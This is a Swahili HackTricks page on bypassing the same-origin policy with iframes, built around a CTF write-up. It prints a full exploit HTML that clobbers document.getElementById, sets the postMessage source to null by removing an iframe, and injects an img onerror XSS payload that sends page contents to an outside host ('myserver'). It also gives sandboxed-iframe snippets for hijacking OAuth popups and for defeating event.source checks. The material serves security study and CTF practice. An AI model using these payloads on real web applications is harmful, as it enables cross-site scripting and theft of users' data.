Kukwepa SOP na Iframes - 2

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Iframes katika SOP-2

Katika solution ya challenge, @Strellic_ anapendekeza mbinu sawa na sehemu iliyopita. Tuchunguze.

Katika changamoto hii mshambuliaji anahitaji bypass hii:

if (e.source == window.calc.contentWindow && e.data.token == window.token) {

Ikiwa anafanya hivyo, anaweza kutuma postmessage yenye maudhui ya HTML ambayo yataandikwa kwenye ukurasa kwa innerHTML bila kusafishwa (XSS).

Njia ya kupita ukaguzi wa kwanza ni kufanya window.calc.contentWindow kuwa undefined na e.source kuwa null:

  • window.calc.contentWindow ni kwa kweli document.getElementById("calc"). Unaweza ku-clobber document.getElementById na <img name=getElementById /> (kumbuka kwamba Sanitizer API -here- haijawekwa ili kulinda dhidi ya DOM clobbering attacks katika hali yake ya chaguo-msingi).
  • Kwa hiyo, unaweza ku-clobber document.getElementById("calc") na <img name=getElementById /><div id=calc></div>. Kisha, window.calc itakuwa undefined.
  • Sasa, tunahitaji e.source kuwa undefined au null (kwa sababu == inatumiwa badala ya ===, null == undefined ni True). Kupata hili ni rahisi. Ikiwa utaumba iframe na kutuma postMessage kutoka ndani yake na mara moja kuondoa iframe, e.origin itakuwa null. Angalia msimbo ufuatao
let iframe = document.createElement("iframe")
document.body.appendChild(iframe)
window.target = window.open("http://localhost:8080/")
await new Promise((r) => setTimeout(r, 2000)) // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`)
document.body.removeChild(iframe) //e.origin === null

Ili kupitisha ukaguzi wa pili kuhusu token, tuma token yenye thamani null na ufanye window.token kuwa undefined:

  • Kutuma token katika postMessage kwa thamani null ni rahisi.
  • Uthibitisho wa window.token unapatikana kwa kuwaita function getCookie inayotumia document.cookie. Kumbuka kwamba upatikanaji wowote wa document.cookie kwenye kurasa zenye origin null husababisha hitilafu (error). Hii itafanya window.token kuwa na thamani undefined.

Suluhisho la mwisho la @terjanq ni lifuatayo:

<html>
<body>
<script>
// Abuse "expr" param to cause a HTML injection and
// clobber document.getElementById and make window.calc.contentWindow undefined
open(
'https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"'
)

function start() {
var ifr = document.createElement("iframe")
// Create a sandboxed iframe, as sandboxed iframes will have origin null
// this null origin will document.cookie trigger an error and window.token will be undefined
ifr.sandbox = "allow-scripts allow-popups"
ifr.srcdoc = `<script>(${hack})()<\/script>`

document.body.appendChild(ifr)

function hack() {
var win = open("https://obligatory-calc.ctf.sekai.team")
setTimeout(() => {
parent.postMessage("remove", "*")
// this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
// token=null equals to undefined and e.source will be null so null == undefined
win.postMessage(
{
token: null,
result:
"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>",
},
"*"
)
}, 1000)
}

// this removes the iframe so e.source becomes null in postMessage event.
onmessage = (e) => {
if (e.data == "remove") document.body.innerHTML = ""
}
}
setTimeout(start, 1000)
</script>
</body>
</html>

2025 Null-Origin Popups (TryHackMe - Vulnerable Codes)

Kazi ya hivi karibuni ya TryHackMe (“Vulnerable Codes”) inaonyesha jinsi OAuth popups zinaweza kuibiwa wakati opener iko ndani ya sandboxed iframe inayoruhusu tu scripts na popups. Iframe inalazimisha iframe yenyewe na popup zote kuwa na origin ya "null", hivyo handlers zinazokagua if (origin !== window.origin) return zinashindwa kimya kwa sababu window.origin ndani ya popup pia ni "null". Ingawa kivinjari bado kinaonyesha location.origin ya kweli, mwanaathiriwa hacheki kamwe, kwa hivyo ujumbe unaodhibitiwa na mshambuliaji unapita bila kutambuliwa.

const frame = document.createElement('iframe');
frame.sandbox = 'allow-scripts allow-popups';
frame.srcdoc = `
<script>
const pop = open('https://oauth.example/callback');
pop.postMessage({ cmd: 'getLoginCode' }, '*');
<\/script>`;
document.body.appendChild(frame);

Takeaways for abusing that setup:

  • Handlers ambazo zinalinganisha origin na window.origin ndani ya popup zinaweza kupitishwa kwa sababu vyote vinatathminiwa kama "null", hivyo ujumbe uliofanywa kuonekana halali.
  • Sandboxed iframes zinazowapa allow-popups lakini hazijajumuisha allow-same-origin bado huanzisha popups zilizofungwa kwa null origin inayodhibitiwa na mshambuliaji, zikikupa eneo thabiti hata katika matoleo ya Chromium ya 2025.

Source-nullification & frame-restriction bypasses

Industry writeups around CVE-2024-49038 highlight two reusable primitives for this page: (1) unaweza bado kuingiliana na kurasa ambazo zinaset X-Frame-Options: DENY kwa kuzindua kupitia window.open na kutuma messages mara tu urambazaji ukimeta, na (2) unaweza brute-force checks za event.source == victimFrame kwa kuondoa iframe mara moja baada ya kutuma message ili mpokeaji aone tu null katika handler.

const probe = document.createElement('iframe');
probe.sandbox = 'allow-scripts';
probe.onload = () => {
const victim = open('https://target-app/');
setTimeout(() => {
probe.contentWindow.postMessage(payload, '*');
probe.remove();
}, 500);
};
document.body.appendChild(probe);

Unganisha hili na mbinu ya DOM-clobbering hapo juu: mara mpokeaji anaona tu event.source === null, kila mlinganisho dhidi ya window.calc.contentWindow au kitu kinachofanana nacho huporomoka, na hivyo kukuruhusu kusafirisha malicious HTML sinks kupitia innerHTML tena.

Marejeleo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks